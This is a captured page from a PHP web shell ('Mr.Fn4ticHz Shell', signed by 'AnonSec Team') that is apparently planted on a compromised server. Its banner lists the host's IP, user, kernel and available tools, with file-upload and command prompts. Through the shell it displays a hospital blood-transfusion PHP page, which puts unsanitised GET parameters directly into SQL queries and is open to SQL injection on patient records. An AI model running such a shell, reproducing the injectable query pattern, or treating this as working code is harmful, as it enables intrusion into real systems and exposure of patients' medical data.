Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.116.36.194
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//showBlood_Transfusion.php
  
  <?php session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
include 'header.php';
include 'dashboarddocument.php';
include("dbconnection.php");
if(isset($_POST['signup'])) 
?>

 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
        <h3 align='center'>Blood Transfusion Start</h3>
   	<table id="example2" class="table table-bordered table-hover"> 
   
   	<?php
$sql ="SELECT * FROM bloodtransfusion WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND id='$_GET[id]'";
$qsql = mysqli_query($con,$sql);
while($rs1 = mysqli_fetch_array($qsql))
{
     echo " <tbody>

            <tr> <td>Start at :</td>  <td>&nbsp;$rs1[blood_start]</td> </tr>
          
                        <tr> <td>Blood Bag Number :</td>  <td>&nbsp;$rs1[Blood_Bag_Number]</td> </tr>
              		<tr><td>Product's Blood Group : </td> <td>$rs1[Products_Blood_Group]</td></tr>
              		<tr><td>Product's Name(PL. encircle) : </td> <td>$rs1[product_name]</td></tr>
              		<tr><td>Name of the Blood Bank: : </td><td>$rs1[blood_bank_name]</td></tr>
              		<tr><td>Date of expiry: </td><td>$rs1[date_of_expiry]</td>          </tr> 
              			<tr><td>Blood Checked by the Doctor: </td><td>$rs1[Blood_Checked_Doctor]</td>          </tr>  
              			<tr><td width='50%'>SPo2</td><td  width='50%'>$rs1[Spo2]</td></tr>
<tr><td  width='50%'>RBS</td><td  width='50%'>$rs1[RBS]</td></tr>
<tr><td  width='50%'>Temperature</td><td  width='50%'>$rs1[Temp]</td></tr>
<tr><td  width='50%'>Pulse</td><td  width='50%'>$rs1[Pulse]</td></tr>
<tr><td  width='50%'>Blood Pressure:</td><td  width='50%'>$rs1[BP2]/$rs1[BP]</td></tr>
          
          ";
}

?> 
   	</table>
   	
   	 <h3 align='center'>Blood Transfusion Stop</h3>
   	<table id="example2" class="table table-bordered table-hover"> 
   
   	<?php
$sql1 ="SELECT * FROM bloodtransfusion WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND id='$_GET[id]'";
$qsql1 = mysqli_query($con,$sql1);
while($rs21 = mysqli_fetch_array($qsql1))
{
    $sql ="SELECT * FROM  Medical_vitals WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND  stopid='$_GET[id]'";
$qsql = mysqli_query($con,$sql);
while($rs1 = mysqli_fetch_array($qsql))
{
  
     echo " <tbody>

      
            <tr> <td>Stop at :</td>  <td>&nbsp;$rs21[blood_stop]</td> </tr>
                       
              			<tr><td width='50%'>SPo2</td><td  width='50%'>$rs1[SPo2]</td></tr>
<tr><td  width='50%'>RBS</td><td  width='50%'>$rs1[RBS]</td></tr>
<tr><td  width='50%'>Temperature</td><td  width='50%'>$rs1[Temp]</td></tr>
<tr><td  width='50%'>Pulse</td><td  width='50%'>$rs1[Pulse]</td></tr>
<tr><td  width='50%'>Blood Pressure:</td><td  width='50%'>$rs1[BP2]/$rs1[BP]</td></tr>
          
          ";
}
}

?> 
   	</table>

Anon7 - 2022
AnonSec Team